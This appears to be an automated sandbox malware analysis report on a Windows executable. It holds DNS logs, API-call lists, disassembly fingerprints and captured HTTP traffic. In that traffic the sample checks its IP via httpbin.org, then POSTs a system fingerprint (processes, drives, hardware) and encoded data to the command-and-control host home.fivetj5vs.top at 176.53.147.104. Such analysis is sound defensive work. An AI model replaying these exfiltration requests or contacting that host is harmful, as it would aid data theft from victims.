Jan 11, 2025 06:36:32.317082882 CET | 55122 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 06:36:32.846215010 CET | 53 | 55122 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 06:36:32.846227884 CET | 53 | 55122 | 1.1.1.1 | 192.168.2.8
                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Jan 11, 2025 06:36:24.212249041 CET | 192.168.2.8 | 1.1.1.1 | 0x762b | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                                        Jan 11, 2025 06:36:24.212344885 CET | 192.168.2.8 | 1.1.1.1 | 0xd902 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
                                        Jan 11, 2025 06:36:26.420789003 CET | 192.168.2.8 | 1.1.1.1 | 0xae30 | Standard query (0) | home.fivetj5vs.top | A (IP address) | IN (0x0001) | false
                                        Jan 11, 2025 06:36:26.420850992 CET | 192.168.2.8 | 1.1.1.1 | 0xfa48 | Standard query (0) | home.fivetj5vs.top | 28 | IN (0x0001) | false
                                        Jan 11, 2025 06:36:30.681777954 CET | 192.168.2.8 | 1.1.1.1 | 0xaaf1 | Standard query (0) | home.fivetj5vs.top | A (IP address) | IN (0x0001) | false
                                        Jan 11, 2025 06:36:30.681835890 CET | 192.168.2.8 | 1.1.1.1 | 0x3734 | Standard query (0) | home.fivetj5vs.top | 28 | IN (0x0001) | false
                                        Jan 11, 2025 06:36:32.316998005 CET | 192.168.2.8 | 1.1.1.1 | 0x9340 | Standard query (0) | home.fivetj5vs.top | A (IP address) | IN (0x0001) | false
                                        Jan 11, 2025 06:36:32.317082882 CET | 192.168.2.8 | 1.1.1.1 | 0x6185 | Standard query (0) | home.fivetj5vs.top | 28 | IN (0x0001) | false
                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Jan 11, 2025 06:36:24.219350100 CET | 1.1.1.1 | 192.168.2.8 | 0x762b | No error (0) | httpbin.org | | 50.19.58.113 | A (IP address) | IN (0x0001) | false
                                        Jan 11, 2025 06:36:24.219350100 CET | 1.1.1.1 | 192.168.2.8 | 0x762b | No error (0) | httpbin.org | | 3.210.94.60 | A (IP address) | IN (0x0001) | false
                                        Jan 11, 2025 06:36:26.889525890 CET | 1.1.1.1 | 192.168.2.8 | 0xae30 | No error (0) | home.fivetj5vs.top | | 176.53.147.104 | A (IP address) | IN (0x0001) | false
                                        Jan 11, 2025 06:36:31.149578094 CET | 1.1.1.1 | 192.168.2.8 | 0xaaf1 | No error (0) | home.fivetj5vs.top | | 176.53.147.104 | A (IP address) | IN (0x0001) | false
                                        Jan 11, 2025 06:36:32.846227884 CET | 1.1.1.1 | 192.168.2.8 | 0x9340 | No error (0) | home.fivetj5vs.top | | 176.53.147.104 | A (IP address) | IN (0x0001) | false
                                        • httpbin.org
                                        • home.fivetj5vs.top
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.8 | 49706 | 176.53.147.104 | 80 | 7508 | C:\Users\user\Desktop\FYQ6Ee6gbS.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jan 11, 2025 06:36:26.897887945 CET | 12360 | OUT | POST /enQdvpMCNJgKflSEBdde1736138767 HTTP/1.1
                                        Host: home.fivetj5vs.top
                                        Accept: */*
                                        Content-Type: application/json
                                        Content-Length: 442324
                                        Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 34 34 35 33 32 30 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "8528974808644453208", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
                                        Jan 11, 2025 06:36:26.902802944 CET | 2472 | OUT | Data Raw: 72 66 6f 79 66 38 41 53 5a 50 6a 76 5c 2f 34 78 5a 34 66 66 5c 2f 56 78 48 38 70 4e 52 79 64 76 78 5c 2f 70 58 37 6f 66 74 70 66 38 45 59 50 42 5c 2f 67 37 77 64 66 66 46 54 39 68 58 51 64 63 30 62 78 62 34 61 69 46 33 34 68 2b 42 64 37 34 70 31
                                        Data Ascii: rfoyf8ASZPjv\/4xZ4ff\/VxH8pNRydvx\/pX7oftpf8EYPB\/g7wdffFT9hXQdc0bxb4aiF34h+Bd74p1zxPoXj3w7a2xN+ng+98VXes+I7TxzCyfbbGzvdfvbLWB52naZb2d41tZal+Deia3Za7Z\/arTzI5IpHtr6xuYzBf6bewsUuLG\/tn\/eW11BIrI8bjBxvQsjKx\/pn6Pn0p+HvG3E4\/hrN8lpcA+IuX06uOXCVTP
                                        Jan 11, 2025 06:36:26.902816057 CET | 2472 | OUT | Data Raw: 2f 77 44 6c 68 2b 66 2b 66 72 36 32 5a 4e 36 62 4e 6a 33 48 5c 2f 4c 78 46 46 39 70 71 4a 30 66 63 37 5c 2f 76 45 5c 2f 64 48 7a 66 79 7a 33 50 2b 52 32 72 6f 4e 43 72 4a 48 74 33 72 73 4d 50 5c 2f 54 50 5c 2f 58 2b 64 37 5c 2f 38 41 36 5c 2f 38
                                        Data Ascii: /wDlh+f+fr62ZN6bNj3H\/LxFF9pqJ0fc7\/vE\/dHzfyz3P+R2roNCrJHt3rsMP\/TP\/X+d7\/8A6\/8ACmbXwGR40h83\/VcTz\/5P5\/yp\/TZ8\/lyx4\/d\/89vx\/Tr+nFDeYI0d\/ueV\/wAs4v8AU\/56Cg6CtJsk37DsTy\/Niz+\/\/wA57+9TfekZHeNPMPEf+v7c\/wCTyKIjujebZsT\/AF3J\/wCXj6f1\/n
                                        Jan 11, 2025 06:36:26.902839899 CET | 2472 | OUT | Data Raw: 71 4e 57 52 2b 7a 5a 64 77 35 77 6a 6d 39 50 44 5a 33 67 71 45 73 58 67 63 77 77 39 44 47 59 4f 4d 63 5a 69 50 71 46 62 44 59 6d 6c 47 76 51 72 51 6a 7a 52 78 6e 4e 4f 45 34 74 63 32 4d 64 50 6c 64 6e 52 35 72 79 4f 5c 2f 31 5c 2f 77 43 4c 6b 58
                                        Data Ascii: qNWR+zZdw5wjm9PDZ3gqEsXgcww9DGYOMcZiPqFbDYmlGvQrQjzRxnNOE4tc2MdPldnR5ryO\/1\/wCLkXhDwt4sbwZ4fg0a1l8P6uNQvPEF\/L4r1G\/tBZTvLZ3llNb6d4Nubd1GyBZfB8t9bsxaG\/MxWQfjhX6B\/GK\/On\/DrxE6MFluorSwjBON\/wBsvraGdR3J+ytO2B1CnoMkfAyruz2xX9e\/RZwleXDfFGd4irW
                                        Jan 11, 2025 06:36:26.902857065 CET | 2472 | OUT | Data Raw: 31 43 5c 2f 33 54 2b 48 38 78 56 71 71 39 42 6f 52 62 44 37 66 35 5c 2f 43 6b 4b 6c 65 63 39 5c 2f 78 71 61 6b 4b 37 76 58 38 4b 6a 6e 58 6e 5c 2f 58 7a 4e 50 61 65 58 34 5c 2f 38 41 70 37 52 5c 2f 65 48 2b 66 78 70 6c 57 4b 69 32 48 32 5c 2f 7a
                                        Data Ascii: 1C\/3T+H8xVqq9BoRbD7f5\/CkKlec9\/xqakK7vX8KjnXn\/XzNPaeX4\/8Ap7R\/eH+fxplWKi2H2\/z+FWdhBJ2\/H+lQd3+g\/lVplzweCKhZccHkGgBj\/dP4fzFMfr+H9TUtNZd2O2KDSn1+RDUPP3Pf\/P4d\/1qambfn3+2P8\/zoNCKq9WKKDoK9Mfp+P8AQ0+kYFvzzQdBB\/Ft7\/p1xUWw+3+fwqV\/9Yf90f0o
                                        Jan 11, 2025 06:36:26.902893066 CET | 2472 | OUT | Data Raw: 35 6b 33 37 6e 35 50 2b 57 58 48 6e 77 66 35 37 65 5c 2f 72 51 75 79 53 4e 5c 2f 77 43 46 5c 2f 77 44 52 5c 2f 4b 5c 2f 65 5c 2f 75 4a 76 7a 5c 2f 35 66 6a 5c 2f 54 74 32 6d 6b 6b 2b 58 48 33 45 38 33 48 5c 2f 54 66 74 5c 2f 6f 76 62 6a 5c 2f 4f
                                        Data Ascii: 5k37n5P+WXHnwf57e\/rQuySN\/wCF\/wDR\/K\/e\/uJvz\/5fj\/Tt2mkk+XH3E83H\/Tft\/ovbj\/OKZI399N\/\/AC2\/d\/8ALH\/9dT7Xzl\/XzOghb7r7\/kT\/AK5fv\/8AP1P60zzPudP+\/vX\/AD\/I1Ptf7jn5\/N\/e+\/Hequ15FCfu9sn\/ACz8ryDz+vPPtzVAPk\/dsmfMR7fMsUcsuOg79aPLdo\/ub8
                                        Jan 11, 2025 06:36:26.902940989 CET | 2472 | OUT | Data Raw: 68 75 6a 75 4c 57 36 67 64 34 70 6f 32 47 51 53 72 48 44 67 71 32 31 67 77 48 35 5a 32 50 37 62 50 37 4f 44 58 45 31 33 71 48 78 4e 4a 75 4c 6d 65 53 35 75 4a 47 38 48 2b 50 6e 61 53 61 61 56 70 5a 5a 47 32 65 46 6d 79 7a 73 7a 4d 66 63 6d 76 38
                                        Data Ascii: hujuLW6gd4po2GQSrHDgq21gwH5Z2P7bP7ODXE13qHxNJuLmeS5uJG8H+PnaSaaVpZZG2eFmyzszMfcmv8AiUh4VeLXiPVzPA8AeGHiLx1i+G8bSpcR4bg7gniXiavw\/XxCxdHC0M7o5LluOqZTXxdTBZhTwtLHQoTrzy\/HRpKUsLWUP+yTNPFDwv4BoZXjOOPEjgHgzC8RYarV4fxHFfGHD3DtHPcPh1hKuKr5NVzjMcHTzO
                                        Jan 11, 2025 06:36:26.902965069 CET | 2472 | OUT | Data Raw: 5a 6e 52 37 5c 2f 39 33 38 53 47 52 63 66 68 5c 2f 49 5c 2f 35 5c 2f 6e 55 4e 57 4b 68 66 37 78 5c 2f 44 2b 51 6f 4e 65 64 2b 58 39 66 4d 72 73 75 33 48 66 4e 4e 71 78 55 54 39 66 77 5c 2f 71 61 44 55 5a 55 45 6b 66 79 39 63 5c 2f 68 5c 2f 6e 72
                                        Data Ascii: ZnR7\/938SGRcfh\/I\/5\/nUNWKhf7x\/D+QoNed+X9fMrsu3HfNNqxUT9fw\/qaDUZUEkfy9c\/h\/nr0qeig6ClJH8vHH17\/wCen0\/VlTP90\/h\/MVDQdBDyx\/zxTP40+pqWTt+P9KjoOyn1+RD8zep\/l\/hmo2jT3CdP85\/z0q1Ucnb8f6UDht8\/0RTki\/uD17f0H+PrzVaRXRj\/AB\/r\/k+h6+tX5P8Ac\/n
                                        Jan 11, 2025 06:36:26.902986050 CET | 2472 | OUT | Data Raw: 5c 2f 73 53 66 6c 32 70 37 62 48 6a 6d 33 2b 59 6e 6d 66 39 73 4d 66 35 5c 2f 38 41 72 35 46 50 6a 5c 2f 65 65 71 50 38 41 38 73 6f 35 49 73 66 35 5c 2f 48 33 6f 41 70 79 66 33 6b 2b 76 6c 66 6d 63 66 79 36 66 6c 33 71 54 7a 45 45 6e 2b 70 38 6d
                                        Data Ascii: \/sSfl2p7bHjm3+Ynmf9sMf5\/8Ar5FPj\/eeqP8A8so5Isf5\/H3oApyf3k+vlfmcfy6fl3qTzEEn+p8maf8Ae5\/13HX\/AETGf88elO3bZE2TRun5\/wCOf6YqFZDH5zOkn7z\/AJ9\/+fcd\/wD9XatPaeX4\/wDAAbJjy9++R383\/VyS\/uOnP\/1x6\/qh8vzP7\/8A2y\/1PH+fzNPX\/ck9\/M\/cf54PtzR8sjTO6
                                        Jan 11, 2025 06:36:26.903019905 CET | 2472 | OUT | Data Raw: 2b 4d 72 66 52 74 52 74 4e 47 75 57 38 50 2b 48 76 46 64 79 7a 52 33 47 69 53 57 73 76 35 6a 4c 78 6b 38 4c 49 59 72 4e 4d 46 55 34 34 79 53 6a 69 73 6c 65 4d 5c 2f 74 4f 6a 58 71 56 71 45 73 4a 48 4c 38 62 69 4d 74 78 74 57 54 72 55 6f 52 71 55
                                        Data Ascii: +MrfRtRtNGuW8P+HvFdyzR3GiSWsv5jLxk8LIYrNMFU44ySjisleM\/tOjXqVqEsJHL8biMtxtWTrUoRqUMNmGDxuDq4ii6lCOJwOOpe058FilS\/Y4+AHjNPB5RmFPw74iq4LPXhFlWIoUcPXjipY7CUMfhIctHEznRqV8FisJioUsRGjU9hjMHVcVHF4Z1frL9mX9r34i\/s26qLbT3fxR8Pr6487W\/Amo3kkNoZHPz6loF4
                                        Jan 11, 2025 06:36:26.907641888 CET | 2472 | OUT | Data Raw: 35 64 31 6a 71 4f 71 61 44 4a 65 36 6e 72 6e 68 66 53 62 45 33 47 6f 36 39 5a 32 7a 66 67 74 62 36 4e 48 30 52 73 4c 68 33 69 63 56 34 6d 63 64 59 57 6e 43 6a 4f 76 4f 4f 4b 34 37 7a 48 44 59 69 6e 54 6f 34 37 44 5a 62 57 39 72 68 4b 2b 55 55 38
                                        Data Ascii: 5d1jqOqaDJe6nrnhfSbE3Go69Z2zfgtb6NH0RsLh3icV4mcdYWnCjOvOOK47zHDYinTo47DZbW9rhK+UU8VSnQx2Kw2HxFKpRjVoTxFN1oQjNSP63w\/09fpz4zFwweC+jh9HnG1qtaNCjPBeCmV4zC4ipPLsVm0HhsdhuJ6uBxNKpl+AxeJp16GIqUKkaFSMKkqnuP9Kf+H0f\/BQL\/oQv2Ov\/AAlvjX\/89Ovz8+LfxY+L3
                                        Jan 11, 2025 06:36:30.613703966 CET | 138 | IN | HTTP/1.1 200 OK
                                        server: nginx/1.22.1
                                        date: Sat, 11 Jan 2025 05:36:30 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 1
                                        Data Raw: 30
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.8 | 49707 | 176.53.147.104 | 80 | 7508 | C:\Users\user\Desktop\FYQ6Ee6gbS.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jan 11, 2025 06:36:31.346358061 CET | 98 | OUT | GET /enQdvpMCNJgKflSEBdde1736138767?argument=0 HTTP/1.1
                                        Host: home.fivetj5vs.top
                                        Accept: */*
                                        Jan 11, 2025 06:36:32.238010883 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                                        server: nginx/1.22.1
                                        date: Sat, 11 Jan 2025 05:36:31 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 207
                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.8 | 49708 | 176.53.147.104 | 80 | 7508 | C:\Users\user\Desktop\FYQ6Ee6gbS.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jan 11, 2025 06:36:32.873265028 CET | 171 | OUT | POST /enQdvpMCNJgKflSEBdde1736138767 HTTP/1.1
                                        Host: home.fivetj5vs.top
                                        Accept: */*
                                        Content-Type: application/json
                                        Content-Length: 31
                                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                        Data Ascii: { "id1": "0", "data": "Done1" }
                                        Jan 11, 2025 06:36:33.786113024 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                                        server: nginx/1.22.1
                                        date: Sat, 11 Jan 2025 05:36:33 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 207
                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.8 | 49705 | 50.19.58.113 | 443 | 7508 | C:\Users\user\Desktop\FYQ6Ee6gbS.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-11 05:36:24 UTC | 52 | OUT | GET /ip HTTP/1.1
                                        Host: httpbin.org
                                        Accept: */*
                                        2025-01-11 05:36:25 UTC | 224 | IN | HTTP/1.1 200 OK
                                        Date: Sat, 11 Jan 2025 05:36:25 GMT
                                        Content-Type: application/json
                                        Content-Length: 31
                                        Connection: close
                                        Server: gunicorn/19.9.0
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: true
                                        2025-01-11 05:36:25 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                        Data Ascii: { "origin": "8.46.123.189"}



                                        Target ID: 1
                                        Start time: 00:36:20
                                        Start date: 11/01/2025
                                        Path: C:\Users\user\Desktop\FYQ6Ee6gbS.exe
                                        Wow64 process (32bit): true
                                        Commandline: "C:\Users\user\Desktop\FYQ6Ee6gbS.exe"
                                        Imagebase: 0x220000
                                        File size: 4'487'168 bytes
                                        MD5 hash: 1149DC52A38AC45DE7BA2D62192C2918
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Reputation: low
                                        Has exited: true


                                          Execution Graph

                                          Execution Coverage: 1.9%
                                          Dynamic/Decrypted Code Coverage: 0%
                                          Signature Coverage: 17.2%
                                          Total number of Nodes: 290
                                          Total number of Limit Nodes: 49
                                          [execution_graph: node and edge dump of the rendered execution graph; the graph itself is not recoverable as text. Windows API calls attached to its nodes: WSAStartup, socket, ioctlsocket, connect, getsockname, closesocket, send, recvfrom, select, setsockopt, WSAIoctl, WSAGetLastError, WSAEventSelect, WSAEnumNetworkEvents, WSACloseEvent, gethostname, SleepEx, RegOpenKeyExA, RegQueryValueExA, RegEnumKeyExA, RegCloseKey, CloseHandle, FindFirstFileA, FindFirstFileW, FindNextFileW, CharUpperA, QueryFullProcessImageNameA, GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, islower]
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                          • API String ID: 0-1590685507
                                          • Opcode ID: 2e2a4a6c20c901e1cd69a9b6d5504294487d925f51940b7ccef233dc8c292ac0
                                          • Instruction ID: f445c57e489cf3cb1449e18dad13dac2b9281bcb62aba421d8561c42944c7464
                                          • Opcode Fuzzy Hash: 2e2a4a6c20c901e1cd69a9b6d5504294487d925f51940b7ccef233dc8c292ac0
                                          • Instruction Fuzzy Hash: 7CC2C171A143459FD724CF28C584B6AB7E1BF88314F05C66DEC989B262D770EDA8CB81

                                          Control-flow Graph

                                          APIs
                                          • GetSystemInfo.KERNELBASE ref: 00222579
                                          • GlobalMemoryStatusEx.KERNELBASE ref: 002225CC
                                          • GetDriveTypeA.KERNELBASE ref: 00222647
                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 0022267E
                                          • KiUserCallbackDispatcher.NTDLL ref: 002227E2
                                          • FindFirstFileW.KERNELBASE ref: 002228F8
                                          • FindNextFileW.KERNELBASE ref: 0022291F
                                          Strings
                                          Similarity
                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                          • String ID: 7%r$;%"$@$}%r
                                          • API String ID: 3271271169-2978697209
                                          • Opcode ID: 157d48a3a0da28df575dc1d53acb1bbe903cb7f0214208255a5e4b9f21ba5faa
                                          • Instruction ID: 2137d6ac8d4d0f46ec6c2b3e463038b98ba0ea3549acfafaa74c0c4556138b35
                                          • Opcode Fuzzy Hash: 157d48a3a0da28df575dc1d53acb1bbe903cb7f0214208255a5e4b9f21ba5faa
                                          • Instruction Fuzzy Hash: 5AD1B3B4905319AFCB40EF68D595AAEBBF0FF84304F00896DE898D7211E7749A94CF52

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                          • String ID: 0$w&r
                                          • API String ID: 2406880114-1681431059
                                          • Opcode ID: 468e053f22414479dc1107e5422a7cbc2177836ab738c3d8aaa2945fc1b19449
                                          • Instruction ID: ff3b6118d1e68aaa49ba4e550be23170a3de13cb835cb22178fb9a61227e0d26
                                          • Opcode Fuzzy Hash: 468e053f22414479dc1107e5422a7cbc2177836ab738c3d8aaa2945fc1b19449
                                          • Instruction Fuzzy Hash: 45E1F7B0904219EFCB50EF68E98469DBBF4BB84304F00846DE898D7355EB79D999CF42

                                          Control-flow Graph

                                          APIs
                                          • WSAEventSelect.WS2_32(?,?,?), ref: 00230712
                                          • WSAEventSelect.WS2_32(?,?,00000000), ref: 002309DD
                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 002309FC
                                          Strings
                                          Similarity
                                          • API ID: EventSelect$EnumEventsNetwork
                                          • String ID: N="$multi.c
                                          • API String ID: 2170980988-841259445
                                          • Opcode ID: df1aab833bcbab33bf6d9b52e6d49b05e835d03284351cbddcadebfda5cfcd0c
                                          • Instruction ID: a300f98b24c9f90e4f14a3ec2c68e8171ede0b8fba3393e5711b1f1489e3104d
                                          • Opcode Fuzzy Hash: df1aab833bcbab33bf6d9b52e6d49b05e835d03284351cbddcadebfda5cfcd0c
                                          • Instruction Fuzzy Hash: 7BD1E4B16283069FE710DF60C8D1B6BB7E9FF84304F04482DF98586251E774E969CB62

                                          Control-flow Graph

                                          APIs
                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 002EB2B7
                                          Strings
                                          Similarity
                                          • API ID: getsockname
                                          • String ID: ares__sortaddrinfo.c$cur != NULL
                                          • API String ID: 3358416759-2430778319
                                          • Opcode ID: a3d0ff02192298c5c66425601ed25a47898c1964aeca053d1d95bacbc9a013f7
                                          • Instruction ID: 216659ab2e323c81b6d7bf4f1df1492b10ac46077ef52fb0b26ba5ac184de8b5
                                          • Opcode Fuzzy Hash: a3d0ff02192298c5c66425601ed25a47898c1964aeca053d1d95bacbc9a013f7
                                          • Instruction Fuzzy Hash: 8FC19D316543569FCB19DF26C891A6B77E1BF88304F84886CE8498B3A2D770ED65CB81
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ae54713731c98928e5f059d39d399807d4a3c74db0b33c210fdba6a65de3bff
                                          • Instruction ID: 307e758f396a32cba780b1821eb916494def4f2c3e44c3028b8b5fc9bb20359e
                                          • Opcode Fuzzy Hash: 2ae54713731c98928e5f059d39d399807d4a3c74db0b33c210fdba6a65de3bff
                                          • Instruction Fuzzy Hash: 7591F2F162D34A4BDB358E28C8947BBB2D9EFD4320F148B2CE899431D4EB719C61D681
                                          APIs
                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,002D712E,?,?,?,00001001,00000000), ref: 002EA90D
                                          Similarity
                                          • API ID: recvfrom
                                          • String ID:
                                          • API String ID: 846543921-0
                                          • Opcode ID: 820aa42a623494aa2d25697273e08922d441791626c991ab4d5ae4bff7827e06
                                          • Instruction ID: ea9d8efb07a36cf73842b1c7769ee00cb155e09592dfca892ce40aef5eee0335
                                          • Opcode Fuzzy Hash: 820aa42a623494aa2d25697273e08922d441791626c991ab4d5ae4bff7827e06
                                          • Instruction Fuzzy Hash: 13F06D75128348AFD2109E02DC84D6BBBEDEFC9764F05455DF948132118270BE10CAB2
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 002DAA19
